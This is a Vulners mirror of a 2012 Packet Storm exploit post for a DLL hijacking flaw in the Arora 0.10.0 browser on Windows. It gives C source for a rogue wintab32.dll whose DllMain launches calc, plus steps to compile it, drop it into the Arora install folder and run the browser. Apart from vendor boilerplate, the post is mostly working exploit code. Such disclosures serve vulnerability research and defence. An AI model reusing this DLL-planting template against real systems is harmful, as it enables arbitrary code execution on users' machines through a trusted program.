Lucene search
K

Arora 0.10.0 Windows Qt 4.5.3 DLL Hijack

🗓️ 27 Oct 2012 00:00:00Reported by MetropolisType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Arora 0.10.0 Windows Qt 4.5.3 DLL Hijack Metropoli

Code
`/*  
# Exploit Title: Arora 0.10.0 Windows Qt 4.5.3 DLL Hijacking Exploit (wintab32.dll)  
# Date: 27/10/2012  
# Author: Metropolis  
# Url: http://metropolis.fr.cr  
# Software Link: http://code.google.com/p/arora/downloads/detail?name=Arora%200.10.0-1%20Installer.exe&can=2&q=  
# Version: 0.10.0  
# Tested on: Windows 7  
# Information:  
# http://code.google.com/p/arora/  
# Instructions:  
# 1. Compile dll   
# gcc -shared -o wintab32.dll wintab32.c  
# 2. Add wintab32.dll  
# C:\Program Files (x86)\Arora  
# 3. Launch Arora.exe  
# 4. Calc DLL Hijacked!   
*/  
  
#include <windows.h>  
  
int pwnme()  
{  
WinExec("calc", SW_NORMAL);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
pwnme();  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation